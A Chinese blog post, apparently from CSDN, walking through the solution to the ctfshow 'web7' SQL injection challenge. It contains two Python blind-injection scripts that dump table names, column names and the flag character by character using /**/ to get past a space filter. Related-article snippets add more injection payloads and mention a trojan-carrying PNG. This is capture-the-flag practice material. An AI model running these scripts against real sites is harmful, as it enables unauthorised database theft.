ctfshow web7

最新推荐文章于 2023-12-30 13:54:31 发布
最新推荐文章于 2023-12-30 13:54:31 发布
阅读量1k 收藏
点赞数 2
分类专栏: web笔记 安全笔记 文章标签: ctf web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/123130278
版权

文章目录

题目分析

在这里插入图片描述
打开题目后,有三个文章

在这里插入图片描述
随便点一个之后发现网址上有个后缀 ?id=2

应该是get传参的注入了

在这里插入图片描述
在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注

他这个过滤了空格,用/**/代替(详见web6 wp

解题过程

盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题

import requests
s=requests.session()
url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.challenge.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

附上羽师傅的脚本

url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url):                    #爆库名
    for i in range(1,5):
        for j in range(32,128):
            u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
            s = url+u
            print(s)
            r =  requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))
                
def table(url):                    #爆表名
    for i in range(4):
        table_name=''
        for j in range(1,6):
            for k in range(48,128):
                u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
                s = url+u
                print(s)
                r =  requests.get(s)            
                if 'By Rudyard Kipling' in r.text:
                    table_name+=chr(k)
            print(table_name)

依次跑得数据表,字段名,字段的值

在这里插入图片描述

在这里插入图片描述
运行了好几次,一直是到这一步就停了,就补充了个反括号去提交flag

在这里插入图片描述
竟然通过了

sec0nd_
关注
专栏目录
2024年最新ctfshow-WEB-web7_ctfshow web7,网络安全推送技术解析
2401_84300859的博客
05-06 838
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
ctfshow-web7
aarong的博客
12-22 1288
如题所示: 随意点入一个文章,在URL中发现有?id=x这样参数,因此判断有SQL注入点: 跟上题一样这题也是过滤空格的 把空格改成/**/,发现没有过滤 随后就是把?id=-1,联合查询就行了 http://63d80c8a-317e-4b8f-a2a0-0af74c123b1b.challenge.ctf.show/index.php/?id=-1/**/union/**/select/**/1,database(),3 得到数据库为web7 爆表得到三张表flag、page、user 这里
Ctfshow web-web7 WP
qq_45427131的博客
05-12 465
首先讲一下数据库的判断 基础知识: select ascii(substr(database(),1,1))=119 ; 上面这段话的意思,可以分布理解 1、 首先是ascii()函数 , 熟悉mysql的应该知道,这是查询字符ascii码的 2、A的ascii码是65 a的ascii码是97 3、Substr()的函数作用是截取,有点类似于limit的作用 Substr(需要截取的字符串,开始位置,截取长度) 4、举个例子,当前我选中mysql数据库,尝试用select substr
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
[ctfshow web7-8]
L1ni01
11-14 582
web7 我一直在想,如果关键字被过滤了,怎么去判读字段长度? 其实盲注的话,貌似就没有这个麻烦了 做题之前先判断哪些关键字被过滤了, index.php?id=1'or1=1# index.php?id=1'or 1=1# 一碰到空格就报错,空格被过滤用 /**/绕过 1.爆库名(web7) 当输入为id=-1/**/or/**/ascii(substr(database(),1,1))=119时出现文章内容,证明库名的第一个字符为‘w’,以此类推。 2.爆表名(flag,page,user) id=-
CTFshow web7
sinat_31884905的博客
05-21 402
```php # -*- coding: utf-8 -*- """ Created on Fri May 21 11:23:55 2021 @author: Administrator """ import requests s=requests.session() url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/" table="" for i in ran.
ctf.show web7
qq_53319483的博客
11-17 3579
ctf.show web7
CTFshow-web-web7
qq_68581192的博客
10-11 168
尝试联合注入,先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断字段显示的位置,输入。发现只有一个flag字段,查询flag表中的flag字段,输入。点击第一篇,发现url中有id=1,可能存在sql注入漏洞。当前使用的数据库是web7,再查询当前数据库的所有表,输入。发现一个flag表,再查询flag表中的所有字段,输入。尝试输入id=1 and 1=1#,发现有错误。回显位置为2,查询当前使用的数据库,输入。
CTF-show WEB入门--web7
最新发布
m0_73912575的博客
12-30 630
CTF-show WEB入门--web7
刷题之旅第27站,CTFshow web7
cc菜的一批
02-17 1021
感谢ctf show平台提供题目 过滤了空格,使用/**/绕过,之后就是常规的注入方式了。 尝试web题目之前,数据库结构,搜索得到flag index.php?id=0/**/or/**/1=1/**/**/union/**/select/**/1,flag,3/**/from/**/flag# 原创文章不易,点个赞再走吧。 ...
ROSE笔记-ctf.show_web7-WP
居上
11-06 271
ctf.show_web7 使用盲注 payload: /?id=1’ or 1=1# 发现过滤了空格所以报错 用//替换空格 payload: /?id=1’//or/**/1=1# 此时页面正常显示 接下来就是查库、查表、查字段 查到显示位置 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,2,3# 查表 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**
CTF show WEB7-8
羽的博客
02-15 3927
点开其中一篇文章,发现可能存在的注入点,输入单引号正常显示,输入双引号无回显,猜测为字符型单引号注入,其中空格被过滤。 使用sleep函数测试注入点id=-1'or/**/sleep(3)# 发现存在延时证明存在注入点,通过有无文章来判断字符。接下来进行sql注入。 1.爆库名(web7) 当输入为id=-1'/**/or/**/ascii(substr(database(),1,1))=119#...
ctfshow web7-9
qq_61988806的博客
12-08 339
web7-9 通过点击几个目录发现id在变化可能存在sql注入 使用/?id=1 and 1来测试 发现出错 尝试找出过滤 最后发现过滤了空格使用/**/来绕过 构造/?id=1/**/and/**/1 和/?id=1/**/and/**/0 时sql恒不成立 构建 ?id=1/**/and/**/1/**/order/**/by/**/3 来查字段 得到字段为3 构建/?id=-1/**/union/**/select/**/1,2,3(由于使用联...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sec0nd_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值